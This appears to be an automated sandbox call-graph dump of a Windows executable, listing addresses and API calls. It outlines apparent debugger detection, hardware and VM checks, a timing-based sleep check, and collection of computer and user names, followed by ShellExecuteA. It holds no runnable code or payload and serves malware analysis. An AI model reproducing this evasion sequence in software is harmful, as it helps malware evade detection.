23077->23084 23107 7bb2ec 15 API calls 3 library calls 23078->23107 23082 7bb54f 23082->23084 23108 7bb43a EnterCriticalSection 23082->23108 23083->23084 23085 7bb5c6 LeaveCriticalSection 23083->23085 23104 7bb61c 23084->23104 23085->23077 23087->22962 23088->22949 23089->22979 23090->22956 23091->22949 23092->22969 23093->22949 23094->22966 23095->22972 23096->22971 23097->22973 23098->22979 23099->22976 23100->22983 23101->22987 23102->22985 23103->23077 23109 7add4a LeaveCriticalSection 23104->23109 23106 7bb58c 23106->22951 23106->22952 23107->23082 23108->23084 23109->23106 23110->22994 23111 7a5232 23112 7a523e __FrameHandler3::FrameUnwindToState 23111->23112 23137 7a5472 23112->23137 23114 7a5245 23115 7a539e 23114->23115 23125 7a526f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 23114->23125 23238 7a5b6a 4 API calls 2 library calls 23115->23238 23117 7a53a5 23231 7b0060 23117->23231 23121 7a53b3 23122 7a528e 23123 7a530f 23145 7afc9c 23123->23145 23125->23122 23125->23123 23234 7b003a 41 API calls 3 library calls 23125->23234 23127 7a5315 23149 7946e0 23127->23149 23131 7a5336 23131->23117 23132 7a533a 23131->23132 23133 7a5343 23132->23133 23236 7b0015 23 API calls std::locale::_Setgloballocale 23132->23236 23237 7a55e3 77 API calls ___scrt_uninitialize_crt 23133->23237 23136 7a534c 23136->23122 23138 7a547b 23137->23138 23240 7a5815 IsProcessorFeaturePresent 23138->23240 23140 7a5487 23241 7a8700 10 API calls 2 library calls 23140->23241 23142 7a548c 23144 7a5490 23142->23144 23242 7a871f 7 API calls 2 library calls 23142->23242 23144->23114 23146 7afcaa 23145->23146 23147 7afca5 23145->23147 23146->23127 23243 7af9f6 55 API calls 23147->23243 23244 793b60 GetSystemInfo 23149->23244 23151 794712 23210 79501d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23151->23210 23254 793f90 IsDebuggerPresent 23151->23254 23154 795040 23235 7a5c8a GetModuleHandleW 23154->23235 23156 794727 SHGetFolderPathA 23157 794763 23156->23157 23157->23157 23263 792830 23157->23263 23159 79477f 23160 7947d0 23159->23160 23161 795044 23159->23161 23279 792a70 23160->23279 23647 791bd0 43 API calls 23161->23647 23164 795049 23648 7a9dff 41 API calls 2 library calls 23164->23648 23165 794800 23292 792760 23165->23292 23168 79504e 23649 791bd0 43 API calls 23168->23649 23169 79481a 23296 796190 23169->23296 23172 795053 23650 7a9dff 41 API calls 2 library calls 23172->23650 23174 7948b1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23174->23168 23180 794905 23174->23180 23175 795058 23651 791bd0 43 API calls 23175->23651 23176 794828 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23176->23164 23176->23174 23178 79505d 23652 7a9dff 41 API calls 2 library calls 23178->23652 23182 792a70 43 API calls 23180->23182 23181 795062 23653 7a9dff 41 API calls 2 library calls 23181->23653 23184 794934 23182->23184 23186 792760 43 API calls 23184->23186 23185 795067 23654 7a9dff 41 API calls 2 library calls 23185->23654 23188 79494e 23186->23188 23301 792530 23188->23301 23191 7949aa 23192 796190 41 API calls 23191->23192 23194 7949e3 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23192->23194 23193 794aaa std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23193->23175 23195 794af6 23193->23195 23194->23172 23194->23193 23196 792a70 43 API calls 23195->23196 23197 794b25 23196->23197 23198 792760 43 API calls 23197->23198 23199 794b3f 23198->23199 23200 792530 43 API calls 23199->23200 23201 794b9b 23200->23201 23202 796190 41 API calls 23201->23202 23205 794bd4 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23202->23205 23203 794c9b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23306 794350 23203->23306 23205->23178 23205->23203 23207 794fea 23207->23185 23207->23210 23208 794cb2 GetModuleFileNameA 23209 794cd0 23208->23209 23209->23209 23334 7985d0 23209->23334 23640 7a53be 23210->23640 23212 794ceb GetComputerNameA GetUserNameA 23213 794d44 23212->23213 23213->23213 23214 792830 43 API calls 23213->23214 23215 794d60 23214->23215 23216 792830 43 API calls 23215->23216 23217 794dac 23216->23217 23218 792530 43 API calls 23217->23218 23219 794dec 23218->23219 23355 7996c0 23219->23355 23221 794e37 23222 796190 41 API calls 23221->23222 23224 794e48 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23222->23224 23223 794fec 23559 7a3210 23223->23559 23224->23181 23227 794f4d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23224->23227 23226 794fe0 23372 794050 23226->23372 23227->23223 23227->23226 24468 7afe46 23231->24468 23234->23123 23235->23131 23236->23133 23237->23136 23238->23117 23239 7b0024 23 API calls std::locale::_Setgloballocale 23239->23121 23240->23140 23241->23142 23242->23144 23243->23146 23245 793b93 GlobalMemoryStatusEx 23244->23245 23246 793c64 23244->23246 23245->23246 23248 793bbe CreateFileA DeviceIoControl 23245->23248 23247 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23246->23247 23249 793c74 23247->23249 23251 793c2f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 23248->23251 23249->23151 23252 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23251->23252 23253 793c60 23252->23253 23253->23151 23255 794025 23254->23255 23258 793fc4 23254->23258 23256 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23255->23256 23257 794042 23256->23257 23257->23156 23257->23210 23258->23255 23655 793c80 CloseHandle 23258->23655 23260 793fd2 23260->23255 23261 793fd6 GetModuleHandleW GetProcAddress 23260->23261 23261->23255 23262 793ffa GetTickCount64 NtDelayExecution GetTickCount64 23261->23262 23262->23255 23264 7928ff 23263->23264 23266 792851 23263->23266 23667 791bd0 43 API calls 23264->23667 23267 792881 23266->23267 23269 79285d _Yarn 23266->23269 23271 7928be 23266->23271 23272 7928c7 23266->23272 23656 7a53cc 23267->23656 23268 792904 23668 791b30 43 API calls 2 library calls 23268->23668 23269->23159 23271->23267 23271->23268 23276 7a53cc std::_Facet_Register 43 API calls 23272->23276 23278 79289b _Yarn 23272->23278 23274 792894 23274->23278 23669 7a9dff 41 API calls 2 library calls 23274->23669 23276->23278 23278->23159 23280 792ab4 23279->23280 23281 792adf _Yarn 23279->23281 23282 792b04 23280->23282 23284 792ac1 23280->23284 23286 792b0d 23280->23286 23281->23165 23282->23284 23285 792b5e 23282->23285 23283 7a53cc std::_Facet_Register 43 API calls 23287 792ad4 23283->23287 23284->23283 23682 791b30 43 API calls 2 library calls 23285->23682 23286->23281 23289 7a53cc std::_Facet_Register 43 API calls 23286->23289 23287->23281 23683 7a9dff 41 API calls 2 library calls 23287->23683 23289->23281 23293 79277b 23292->23293 23294 79278f _Yarn 23293->23294 23684 792910 43 API calls 4 library calls 23293->23684 23294->23169 23297 7961c1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23296->23297 23298 79619e 23296->23298 23297->23176 23298->23297 23685 7a9dff 41 API calls 2 library calls 23298->23685 23302 792540 23301->23302 23302->23302 23303 792557 _Yarn 23302->23303 23686 792910 43 API calls 4 library calls 23302->23686 23303->23191 23305 792592 23305->23191 23307 794399 __fread_nolock 23306->23307 23687 7984a0 23307->23687 23312 7944c5 23758 793a20 23312->23758 23316 794465 23713 797370 23316->23713 23318 794497 23326 7944fe std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23318->23326 23768 7ad2c0 44 API calls ___std_exception_copy 23318->23768 23321 7945dc std::ios_base::_Ios_base_dtor 23327 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23321->23327 23323 794546 OpenProcess 23324 79456c 23323->23324 23323->23326 23324->23326 23328 79463d 23324->23328 23769 795bb0 23326->23769 23329 794639 23327->23329 23773 7a9dff 41 API calls 2 library calls 23328->23773 23329->23207 23329->23208 23337 798614 23334->23337 23339 7985ee _Yarn 23334->23339 23335 7986f4 24182 791bd0 43 API calls 23335->24182 23337->23335 23340 79864f 23337->23340 23341 798683 23337->23341 23338 7986f9 24183 791b30 43 API calls 2 library calls 23338->24183 23339->23212 23340->23338 23342 7a53cc std::_Facet_Register 43 API calls 23340->23342 23346 7a53cc std::_Facet_Register 43 API calls 23341->23346 23349 79866f _Yarn 23341->23349 23342->23349 23344 7986fe 23345 7ac9be __freea 14 API calls 23344->23345 23347 798714 23345->23347 23346->23349 23350 7ac9be __freea 14 API calls 23347->23350 23351 7986d6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23349->23351 24181 7a9dff 41 API calls 2 library calls 23349->24181 23352 79871c 23350->23352 23351->23212 23353 7ac9be __freea 14 API calls 23352->23353 23354 798724 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23353->23354 23354->23212 23356 799703 23355->23356 23357 7997cd 23356->23357 23358 79988e 23356->23358 23365 799708 _Yarn 23356->23365 23359 7997da 23357->23359 23361 799829 23357->23361 23362 799820 23357->23362 24184 791bd0 43 API calls 23358->24184 23366 7a53cc std::_Facet_Register 43 API calls 23359->23366 23367 7a53cc std::_Facet_Register 43 API calls 23361->23367 23371 7997fa _Yarn 23361->23371 23362->23359 23363 799893 23362->23363 24185 791b30 43 API calls 2 library calls 23363->24185 23365->23221 23368 7997ef 23366->23368 23367->23371 23368->23371 24186 7a9dff 41 API calls 2 library calls 23368->24186 23371->23221 23373 794099 __fread_nolock 23372->23373 23374 7984a0 80 API calls 23373->23374 23375 794103 23374->23375 23376 797570 47 API calls 23375->23376 23377 79413c 23376->23377 23378 7941b5 23377->23378 23379 7a47ac 72 API calls 23377->23379 23380 793a20 43 API calls 23378->23380 23381 794150 23379->23381 23382 7941de GetCurrentProcessId 23380->23382 23381->23378 23383 794157 23381->23383 24187 795f10 23382->24187 23385 797370 41 API calls 23383->23385 23387 794165 23385->23387 23391 798930 72 API calls 23387->23391 23388 797480 72 API calls 23389 794202 23388->23389 23390 79422f 23389->23390 23392 793a20 43 API calls 23389->23392 23393 795bb0 72 API calls 23390->23393 23397 794189 23391->23397 23392->23390 23394 794261 std::ios_base::_Ios_base_dtor 23393->23394 23395 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23394->23395 23396 7942b8 23395->23396 23398 79a030 23396->23398 23397->23382 24211 793560 47 API calls std::locale::_Init 23398->24211 23400 79a092 24212 79d1c0 78 API calls 5 library calls 23400->24212 23402 79a0a4 24213 79d000 80 API calls 6 library calls 23402->24213 23404 79a11f 24214 79d570 43 API calls 4 library calls 23404->24214 23406 79a156 24215 7925f0 43 API calls 23406->24215 23408 79a42a 24216 79cf30 80 API calls 23408->24216 23410 79a6bc 24217 7925f0 43 API calls 23410->24217 23412 79aa2a 24218 79cf30 80 API calls 23412->24218 23414 79adfc 23414->23414 23415 792830 43 API calls 23414->23415 23416 79b192 23415->23416 24219 79d000 80 API calls 6 library calls 23416->24219 23418 79b1df 24220 79d570 43 API calls 4 library calls 23418->24220 23420 79b216 23421 792830 43 API calls 23420->23421 23422 79b2ac 23421->23422 24221 79d000 80 API calls 6 library calls 23422->24221 23424 79b2ff 24222 79d570 43 API calls 4 library calls 23424->24222 23426 79b336 23427 792830 43 API calls 23426->23427 23428 79b3cc 23427->23428 24223 79d000 80 API calls 6 library calls 23428->24223 23430 79b43f 24224 79d570 43 API calls 4 library calls 23430->24224 23432 79b476 23433 792830 43 API calls 23432->23433 23434 79b4f4 23433->23434 24225 79d000 80 API calls 6 library calls 23434->24225 23436 79b55f 24226 79d570 43 API calls 4 library calls 23436->24226 23438 79b596 23439 792830 43 API calls 23438->23439 23440 79b614 23439->23440 24227 79d000 80 API calls 6 library calls 23440->24227 23442 79b66f 24228 79d570 43 API calls 4 library calls 23442->24228 23444 79b6a6 23445 792830 43 API calls 23444->23445 23446 79b744 23445->23446 24229 79d000 80 API calls 6 library calls 23446->24229 23448 79b79f 24230 79d570 43 API calls 4 library calls 23448->24230 23450 79b7d6 23451 792830 43 API calls 23450->23451 23452 79b86c 23451->23452 24231 79d000 80 API calls 6 library calls 23452->24231 23454 79b8bf 24232 79d570 43 API calls 4 library calls 23454->24232 23456 79b8f6 23457 792830 43 API calls 23456->23457 23458 79b98c 23457->23458 24233 79d000 80 API calls 6 library calls 23458->24233 23460 79ba0f 24234 79d570 43 API calls 4 library calls 23460->24234 23462 79ba46 23463 792830 43 API calls 23462->23463 23464 79bac4 23463->23464 24235 79d000 80 API calls 6 library calls 23464->24235 23466 79bb1f 24236 79d570 43 API calls 4 library calls 23466->24236 23468 79bb56 23469 792830 43 API calls 23468->23469 23470 79bc14 23469->23470 24237 79d000 80 API calls 6 library calls 23470->24237 23472 79bc6f 24238 79d570 43 API calls 4 library calls 23472->24238 23474 79bca6 23475 792830 43 API calls 23474->23475 23476 79bd64 23475->23476 24239 79d000 80 API calls 6 library calls 23476->24239 23478 79bdb1 24240 79d570 43 API calls 4 library calls 23478->24240 23480 79bde6 23481 792830 43 API calls 23480->23481 23482 79be64 23481->23482 24241 79d000 80 API calls 6 library calls 23482->24241 23484 79bedd 24242 79d570 43 API calls 4 library calls 23484->24242 23486 79bf16 23487 792830 43 API calls 23486->23487 23488 79bfa4 23487->23488 24243 79d000 80 API calls 6 library calls 23488->24243 23490 79c00f 24244 79d570 43 API calls 4 library calls 23490->24244 23492 79c046 23493 792830 43 API calls 23492->23493 23494 79c0c4 23493->23494 24245 79d000 80 API calls 6 library calls 23494->24245 23496 79c12f 24246 79d570 43 API calls 4 library calls 23496->24246 23498 79c166 23499 792830 43 API calls 23498->23499 23500 79c1ec 23499->23500 24247 79d000 80 API calls 6 library calls 23500->24247 23502 79c23f 24248 79d570 43 API calls 4 library calls 23502->24248 23504 79c276 23505 792830 43 API calls 23504->23505 23506 79c2f4 23505->23506 24249 79d000 80 API calls 6 library calls 23506->24249 23508 79c35f 24250 79d570 43 API calls 4 library calls 23508->24250 23510 79c396 23511 792830 43 API calls 23510->23511 23512 79c424 23511->23512 24251 79d000 80 API calls 6 library calls 23512->24251 23514 79c470 24252 79d570 43 API calls 4 library calls 23514->24252 23516 79c4a6 23517 792830 43 API calls 23516->23517 23518 79c574 23517->23518 24253 79d000 80 API calls 6 library calls 23518->24253 23520 79c5d1 24254 79d570 43 API calls 4 library calls 23520->24254 23522 79c606 23523 792830 43 API calls 23522->23523 23524 79c6ac 23523->23524 24255 79d000 80 API calls 6 library calls 23524->24255 23526 79c6ff 24256 79d570 43 API calls 4 library calls 23526->24256 23528 79c736 23528->23528 24257 7925f0 43 API calls 23528->24257 23530 79c9fc 24258 79d000 80 API calls 6 library calls 23530->24258 23532 79ca3f 24259 79d570 43 API calls 4 library calls 23532->24259 23534 79ca76 24260 7925f0 43 API calls 23534->24260 23536 79caf9 24261 79d000 80 API calls 6 library calls 23536->24261 23538 79cb59 24262 79d570 43 API calls 4 library calls 23538->24262 23540 79cb89 24263 7925f0 43 API calls 23540->24263 23543 79cbfb __fread_nolock 24264 79d310 80 API calls 23543->24264 23545 79cc37 Sleep 24265 7adc1b GetSystemTimeAsFileTime 23545->24265 23551 79d440 43 API calls 23558 79cc1e std::ios_base::_Ios_base_dtor 23551->23558 23552 7925a0 43 API calls 23552->23558 23554 79cfb0 43 API calls 23554->23558 23555 792630 43 API calls 23555->23558 23557 792b90 53 API calls 23557->23558 23558->23545 23558->23551 23558->23552 23558->23554 23558->23555 23558->23557 24267 791d90 43 API calls __wsopen_s 23558->24267 24268 79d3c0 80 API calls 23558->24268 24269 791f60 43 API calls 3 library calls 23558->24269 24270 792c80 50 API calls 2 library calls 23558->24270 24271 7925f0 43 API calls 23558->24271 24272 7921d0 43 API calls 3 library calls 23558->24272 24273 7a5ff0 23559->24273 23562 7a327a __fread_nolock 23563 7984a0 80 API calls 23562->23563 23564 7a32f1 23563->23564 23565 797570 47 API calls 23564->23565 23566 7a332a __fread_nolock 23565->23566 23567 7984a0 80 API calls 23566->23567 23568 7a33ad 23567->23568 23569 797570 47 API calls 23568->23569 23570 7a33e6 23569->23570 23571 7a47ac 72 API calls 23570->23571 23591 7a3451 23570->23591 23572 7a3414 23571->23572 23575 797370 41 API calls 23572->23575 23572->23591 23573 793a20 43 API calls 23574 7a34c8 23573->23574 23577 7a47ac 72 API calls 23574->23577 23596 7a352f 23574->23596 23576 7a342d 23575->23576 23580 798930 72 API calls 23576->23580 23578 7a34f2 23577->23578 23581 797370 41 API calls 23578->23581 23578->23596 23579 793a20 43 API calls 23588 7a35a6 23579->23588 23580->23591 23584 7a350b 23581->23584 23582 7a3606 23583 7adc1b GetSystemTimeAsFileTime 23582->23583 23585 7a360d 23583->23585 23592 798930 72 API calls 23584->23592 24294 7adca4 23585->24294 23588->23582 24275 7a3df0 23588->24275 24283 7a3c70 23588->24283 23591->23573 23592->23596 23593 7adcb6 _Yarn 15 API calls 23594 7a361d 23593->23594 24297 7adc83 23594->24297 23596->23579 23597 7a362b 23598 7adc83 41 API calls 23597->23598 23599 7a3658 23597->23599 23598->23597 23600 7a3680 23599->23600 23601 7a3c70 71 API calls 23599->23601 23602 7ac9be __freea 14 API calls 23600->23602 23601->23599 23603 7a3686 23602->23603 23604 7982e0 43 API calls 23603->23604 23605 7a3694 23604->23605 23606 797480 72 API calls 23605->23606 23607 7a369f 23606->23607 23608 7a36cc 23607->23608 23609 793a20 43 API calls 23607->23609 23610 797480 72 API calls 23608->23610 23609->23608 23611 7a36d7 23610->23611 23612 793a20 43 API calls 23611->23612 23613 7a3704 23611->23613 23612->23613 23613->23613 23614 7a377e 23613->23614 23615 7a3c56 23613->23615 23616 792a70 43 API calls 23614->23616 24300 791bd0 43 API calls 23615->24300 23618 7a37ad 23616->23618 23620 792530 43 API calls 23618->23620 23619 7a3c5b 24301 7a9dff 41 API calls 2 library calls 23619->24301 23622 7a382f 23620->23622 23624 792760 43 API calls 23622->23624 23623 7a3c60 24302 7a9dff 41 API calls 2 library calls 23623->24302 23626 7a388f 23624->23626 23628 792530 43 API calls 23626->23628 23630 7a3908 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23628->23630 23629 7a3a34 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23631 7a3a97 ShellExecuteA 23629->23631 23630->23619 23630->23629 23632 7a3b02 23631->23632 23633 7a3b27 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23631->23633 23632->23623 23632->23633 23634 795bb0 72 API calls 23633->23634 23635 7a3b7e std::ios_base::_Ios_base_dtor 23634->23635 23636 795bb0 72 API calls 23635->23636 23637 7a3bf4 std::ios_base::_Ios_base_dtor 23636->23637 23638 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23637->23638 23639 7a3c52 23638->23639 23639->23207 23641 7a53c6 23640->23641 23642 7a53c7 IsProcessorFeaturePresent 23640->23642 23641->23154 23644 7a5e12 23642->23644 24467 7a5dd5 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23644->24467 23646 7a5ef5 23646->23154 23655->23260 23659 7a53d1 23656->23659 23658 7a53eb 23658->23274 23659->23658 23661 791b30 Concurrency::cancel_current_task 23659->23661 23672 7b1945 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 23659->23672 23673 7adcb6 23659->23673 23662 7a53f7 23661->23662 23670 7a691b RaiseException 23661->23670 23662->23662 23664 791b4c 23671 7a63d1 42 API calls 3 library calls 23664->23671 23666 791b73 23666->23274 23668->23274 23670->23664 23671->23666 23672->23659 23678 7b3ae9 __dosmaperr 23673->23678 23674 7b3b27 23681 7ae7f3 14 API calls __dosmaperr 23674->23681 23676 7b3b12 RtlAllocateHeap 23677 7b3b25 23676->23677 23676->23678 23677->23659 23678->23674 23678->23676 23680 7b1945 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 23678->23680 23680->23678 23681->23677 23682->23287 23684->23294 23686->23305 23688 793a20 43 API calls 23687->23688 23689 798519 23688->23689 23690 7a53cc std::_Facet_Register 43 API calls 23689->23690 23691 798520 23690->23691 23774 7a4400 23691->23774 23693 798537 23786 798760 23693->23786 23695 79440e 23698 797570 23695->23698 23696 798568 23696->23695 23697 793a20 43 API calls 23696->23697 23697->23695 23699 7a53cc std::_Facet_Register 43 API calls 23698->23699 23700 7975b0 23699->23700 23701 7a4400 std::locale::_Init 47 API calls 23700->23701 23702 794447 23701->23702 23702->23312 23703 7a47ac 23702->23703 23704 7a4708 23703->23704 23705 7a4761 23704->23705 23708 7ae0bc 44 API calls 23704->23708 23709 79445e 23704->23709 23711 7a4768 23705->23711 23833 7ae0bc 23705->23833 23708->23705 23709->23312 23709->23316 23711->23709 23850 7aa477 23711->23850 23714 79741e 23713->23714 23715 7973f7 23713->23715 23717 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23714->23717 24049 7ac3cd 41 API calls 2 library calls 23715->24049 23718 794473 23717->23718 23719 798930 23718->23719 23720 7a421d std::_Lockit::_Lockit 7 API calls 23719->23720 23721 79896b 23720->23721 23722 7a421d std::_Lockit::_Lockit 7 API calls 23721->23722 23727 7989ad 23721->23727 23723 79898d 23722->23723 23725 7a4275 std::_Lockit::~_Lockit 2 API calls 23723->23725 23724 7a4275 std::_Lockit::~_Lockit 2 API calls 23726 7989d4 23724->23726 23725->23727 23728 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23726->23728 23729 7a53cc std::_Facet_Register 43 API calls 23727->23729 23757 7989cc 23727->23757 23730 7989ee 23728->23730 23731 798a20 23729->23731 23730->23318 23732 7a421d std::_Lockit::_Lockit 7 API calls 23731->23732 23733 798a4d 23732->23733 23734 798b6a 23733->23734 23735 798a8f 23733->23735 24064 7a41d0 43 API calls 2 library calls 23734->24064 24050 7a4500 23735->24050 23741 798ab3 23742 798ac3 23741->23742 24060 7ac9be 23741->24060 23744 798ada 23742->23744 23745 7ac9be __freea 14 API calls 23742->23745 23746 798af1 23744->23746 23748 7ac9be __freea 14 API calls 23744->23748 23745->23744 23747 798b08 23746->23747 23749 7ac9be __freea 14 API calls 23746->23749 23750 798b1f 23747->23750 23751 7ac9be __freea 14 API calls 23747->23751 23748->23746 23749->23747 23752 798b36 23750->23752 23753 7ac9be __freea 14 API calls 23750->23753 23751->23750 23754 7a4275 std::_Lockit::~_Lockit 2 API calls 23752->23754 23753->23752 23755 798b48 23754->23755 24063 7a43ce 43 API calls std::_Facet_Register 23755->24063 23757->23724 23759 793a3a 23758->23759 23759->23318 23761 793a52 23759->23761 24103 7a691b RaiseException 23759->24103 24104 793930 43 API calls 3 library calls 23761->24104 23763 793a88 24105 7a691b RaiseException 23763->24105 23765 793a97 24106 7a63d1 42 API calls 3 library calls 23765->24106 23767 793ac4 23767->23318 23768->23323 23770 795be2 23769->23770 23772 795c0d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23770->23772 24107 797480 23770->24107 23772->23321 23775 7a440c __EH_prolog3 23774->23775 23809 7a421d 23775->23809 23778 7a4448 23815 7a4275 23778->23815 23781 7a442a 23823 7a4588 43 API calls std::locale::_Setgloballocale 23781->23823 23783 7a4432 23824 7a4358 15 API calls 2 library calls 23783->23824 23784 7a4488 std::locale::_Init 23784->23693 23787 7a421d std::_Lockit::_Lockit 7 API calls 23786->23787 23788 79879b 23787->23788 23789 7a421d std::_Lockit::_Lockit 7 API calls 23788->23789 23793 7987de 23788->23793 23790 7987be 23789->23790 23794 7a4275 std::_Lockit::~_Lockit 2 API calls 23790->23794 23791 7a4275 std::_Lockit::~_Lockit 2 API calls 23792 798868 23791->23792 23795 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23792->23795 23803 798828 23793->23803 23829 7935e0 78 API calls 7 library calls 23793->23829 23794->23793 23796 798882 23795->23796 23796->23696 23798 798838 23799 798840 23798->23799 23800 798886 23798->23800 23830 7a43ce 43 API calls std::_Facet_Register 23799->23830 23831 7933b0 43 API calls 2 library calls 23800->23831 23803->23791 23804 79888b 23805 798760 78 API calls 23804->23805 23807 7988df 23805->23807 23832 7998e0 43 API calls 23807->23832 23808 79891b 23808->23696 23810 7a422c 23809->23810 23811 7a4233 23809->23811 23825 7add61 6 API calls 2 library calls 23810->23825 23814 7a4231 23811->23814 23826 7a4c51 EnterCriticalSection 23811->23826 23814->23778 23822 7a4565 43 API calls 2 library calls 23814->23822 23816 7add6f 23815->23816 23817 7a427f 23815->23817 23828 7add4a LeaveCriticalSection 23816->23828 23821 7a4292 23817->23821 23827 7a4c5f LeaveCriticalSection 23817->23827 23820 7add76 23820->23784 23821->23784 23822->23781 23823->23783 23824->23778 23825->23814 23826->23814 23827->23821 23828->23820 23829->23798 23830->23803 23831->23804 23832->23808 23835 7ae005 __FrameHandler3::FrameUnwindToState 23833->23835 23834 7ae018 23865 7ae7f3 14 API calls __dosmaperr 23834->23865 23835->23834 23838 7ae038 23835->23838 23837 7ae01d 23866 7a9def 41 API calls ___std_exception_copy 23837->23866 23840 7ae04a 23838->23840 23841 7ae03d 23838->23841 23857 7b3943 23840->23857 23867 7ae7f3 14 API calls __dosmaperr 23841->23867 23842 7a4785 23842->23709 23856 7adbd6 68 API calls ___std_exception_copy 23842->23856 23846 7ae05a 23868 7ae7f3 14 API calls __dosmaperr 23846->23868 23847 7ae067 23869 7ae0a5 LeaveCriticalSection __fread_nolock 23847->23869 23851 7aa48a ___std_exception_copy 23850->23851 23892 7aa352 23851->23892 23853 7aa496 23903 7a9b2b 23853->23903 23856->23711 23858 7b394f __FrameHandler3::FrameUnwindToState 23857->23858 23870 7add02 EnterCriticalSection 23858->23870 23860 7b395d 23871 7b39e7 23860->23871 23865->23837 23866->23842 23867->23842 23868->23842 23869->23842 23870->23860 23878 7b3a0a 23871->23878 23872 7b3a62 23873 7b2a9c __dosmaperr 14 API calls 23872->23873 23874 7b3a6b 23873->23874 23876 7b3705 ___free_lconv_mon 14 API calls 23874->23876 23877 7b3a74 23876->23877 23883 7b396a 23877->23883 23889 7b525c 6 API calls std::_Locinfo::_Locinfo_dtor 23877->23889 23878->23872 23878->23878 23878->23883 23887 7ac413 EnterCriticalSection 23878->23887 23888 7ac427 LeaveCriticalSection 23878->23888 23880 7b3a93 23890 7ac413 EnterCriticalSection 23880->23890 23884 7b39a3 23883->23884 23891 7add4a LeaveCriticalSection 23884->23891 23886 7ae053 23886->23846 23886->23847 23887->23878 23888->23878 23889->23880 23890->23883 23891->23886 23893 7aa35e __FrameHandler3::FrameUnwindToState 23892->23893 23894 7aa38b 23893->23894 23895 7aa368 23893->23895 23896 7aa383 23894->23896 23909 7ac413 EnterCriticalSection 23894->23909 23924 7a9d72 41 API calls 2 library calls 23895->23924 23896->23853 23899 7aa3a9 23910 7aa3e9 23899->23910 23901 7aa3b6 23925 7aa3e1 LeaveCriticalSection __fread_nolock 23901->23925 23904 7a9b37 23903->23904 23905 7a9b4e 23904->23905 24047 7a9bd6 41 API calls 2 library calls 23904->24047 23906 7a9b61 23905->23906 24048 7a9bd6 41 API calls 2 library calls 23905->24048 23906->23709 23909->23899 23911 7aa419 23910->23911 23912 7aa3f6 23910->23912 23914 7aa411 23911->23914 23926 7aa226 23911->23926 23950 7a9d72 41 API calls 2 library calls 23912->23950 23914->23901 23920 7aa445 23943 7b37d0 23920->23943 23923 7b3705 ___free_lconv_mon 14 API calls 23923->23914 23924->23896 23925->23896 23927 7aa266 23926->23927 23928 7aa23f 23926->23928 23932 7b3aa9 23927->23932 23928->23927 23929 7b262b __fread_nolock 41 API calls 23928->23929 23930 7aa25b 23929->23930 23951 7b33fd 23930->23951 23933 7b3ac0 23932->23933 23934 7aa439 23932->23934 23933->23934 23935 7b3705 ___free_lconv_mon 14 API calls 23933->23935 23936 7b262b 23934->23936 23935->23934 23937 7b264c 23936->23937 23938 7b2637 23936->23938 23937->23920 24007 7ae7f3 14 API calls __dosmaperr 23938->24007 23940 7b263c 24008 7a9def 41 API calls ___std_exception_copy 23940->24008 23942 7b2647 23942->23920 23944 7b37f9 23943->23944 23945 7aa44c 23943->23945 23946 7b3848 23944->23946 23948 7b3820 23944->23948 23945->23914 23945->23923 24017 7a9d72 41 API calls 2 library calls 23946->24017 24009 7b373f 23948->24009 23950->23914 23953 7b3409 __FrameHandler3::FrameUnwindToState 23951->23953 23952 7b34cd 23992 7a9d72 41 API calls 2 library calls 23952->23992 23953->23952 23955 7b345e 23953->23955 23961 7b3411 23953->23961 23962 7bb43a EnterCriticalSection 23955->23962 23957 7b3464 23958 7b3481 23957->23958 23963 7b3505 23957->23963 23991 7b34c5 LeaveCriticalSection __wsopen_s 23958->23991 23961->23927 23962->23957 23964 7b352a 23963->23964 23988 7b354d __wsopen_s 23963->23988 23965 7b352e 23964->23965 23967 7b358c 23964->23967 24000 7a9d72 41 API calls 2 library calls 23965->24000 23968 7b35a3 23967->23968 24001 7b7253 43 API calls __fread_nolock 23967->24001 23993 7b3052 23968->23993 23972 7b35f3 23974 7b3607 23972->23974 23975 7b3656 WriteFile 23972->23975 23973 7b35b3 23976 7b35ba 23973->23976 23977 7b35dd 23973->23977 23978 7b360f 23974->23978 23979 7b3644 23974->23979 23980 7b3678 GetLastError 23975->23980 23975->23988 23976->23988 24002 7b2fea 6 API calls __wsopen_s 23976->24002 24003 7b2c18 47 API calls 4 library calls 23977->24003 23982 7b3632 23978->23982 23983 7b3614 23978->23983 24006 7b30d0 7 API calls 2 library calls 23979->24006 23980->23988 24005 7b3294 8 API calls 3 library calls 23982->24005 23986 7b361d 23983->23986 23983->23988 24004 7b31ab 7 API calls 2 library calls 23986->24004 23988->23958 23989 7b35ee 23989->23988 23991->23961 23992->23961 23994 7be037 __fread_nolock 41 API calls 